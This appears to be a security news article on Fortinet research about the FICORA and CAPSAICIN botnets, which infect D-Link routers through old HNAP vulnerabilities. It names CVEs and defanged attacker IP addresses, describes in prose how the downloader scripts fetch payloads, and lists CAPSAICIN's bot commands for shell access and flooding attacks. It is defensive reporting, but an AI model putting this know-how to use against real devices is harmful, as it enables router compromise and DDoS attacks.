Cybersecurity researchers are warning about a spike in malicious activity that involves roping vulnerable D-Link routers into two different botnets, a Mirai variant dubbed FICORA and a Kaiten (aka Tsunami) variant called CAPSAICIN.
“These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings action on the HNAP (Home Network Administration Protocol) interface,” Fortinet FortiGuard Labs researcher Vincent Li said in a Thursday analysis.
“This HNAP weakness was first exposed almost a decade ago, with numerous devices affected by a variety of CVE numbers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.”
According to the cybersecurity company’s telemetry data, attacks involving FICORA have targeted various countries globally, whereas those related to CAPSAICIN primarily singled out East Asian territories like Japan and Taiwan. The CAPSAICIN activity is also said to have been “intensely” active only between October 21 and 22, 2024.
FICORA botnet attacks lead to the deployment of a downloader shell script (“multi”) from a remote server (“103.149.87[.]69”), which then proceeds to download the main payload for different Linux architectures separately using wget, ftpget, curl, and tftp commands.
Present within the botnet malware is a brute-force attack function containing a hard-coded list of usernames and passwords. The Mirai derivative also packs in features to conduct distributed denial-of-service (DDoS) attacks using UDP, TCP, and DNS protocols.
The downloader script (“bins.sh”) for CAPSAICIN leverages a different IP address (“87.10.220[.]221”), and follows the same approach to fetch the botnet for various Linux architectures to ensure maximum compatibility.
“The malware kills known botnet processes to ensure it is the only botnet executing on the victim host,” Li said. “‘CAPSAICIN’ establishes a connection socket with its C2 server, ‘192.110.247[.]46,’ and sends the victim host’s OS information and the nickname given by the malware back to the C2 server.”
CAPSAICIN then awaits for further commands to be executed on the compromised devices, including “PRIVMSG,” a command that could be used to perform various malicious operations such as follows –
GETIP – Get the IP address from an interface
CLEARHISTORY – Remove command history
FASTFLUX – Start a proxy to a port on another IP to an interface
RNDNICK – Randomize the victim hosts’ nickname
NICK – Change the nickname of the victim host
SERVER – Change command-and-control server
ENABLE – Enable the bot
KILL – Kill the session
GET – Download a file
VERSION – Requests version of the victim host
IRC – Forward a message to the server
SH – Execute shell commands
ISH – Interact with victim host’s shell
SHD – Execute shell command and ignore signals
INSTALL – Download and install a binary to “/var/bin”
BASH – Execute commands using bash
BINUPDATE – Update a binary to “/var/bin” via get
LOCKUP – Kill Telnet backdoor and execute the malware instead
HELP – Display help information about the malware
STD – Flooding attack with random hard-coded strings for the port number and target specified by the attacker
UNKNOWN – UDP flooding attack with random characters for the port number and target specified by the attacker
HTTP – HTTP flooding attack.
HOLD – TCP connection flooding attack.
JUNK – TCP flooding attack.
BLACKNURSE – BlackNurse attack, which is based on the ICMP packet flooding attack
DNS – DNS amplification flooding attack
KILLALL – Stop all DDoS attacks
KILLMYEYEPEEUSINGHOIC – Terminate the original malware
“Although the weaknesses exploited in this attack had been exposed and patched nearly a decade ago, these attacks have remained continuously active worldwide,” Li said. “It is crucial for every enterprise to regularly update the kernel of their devices and maintain comprehensive monitoring.”
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
“}]] The Hacker News
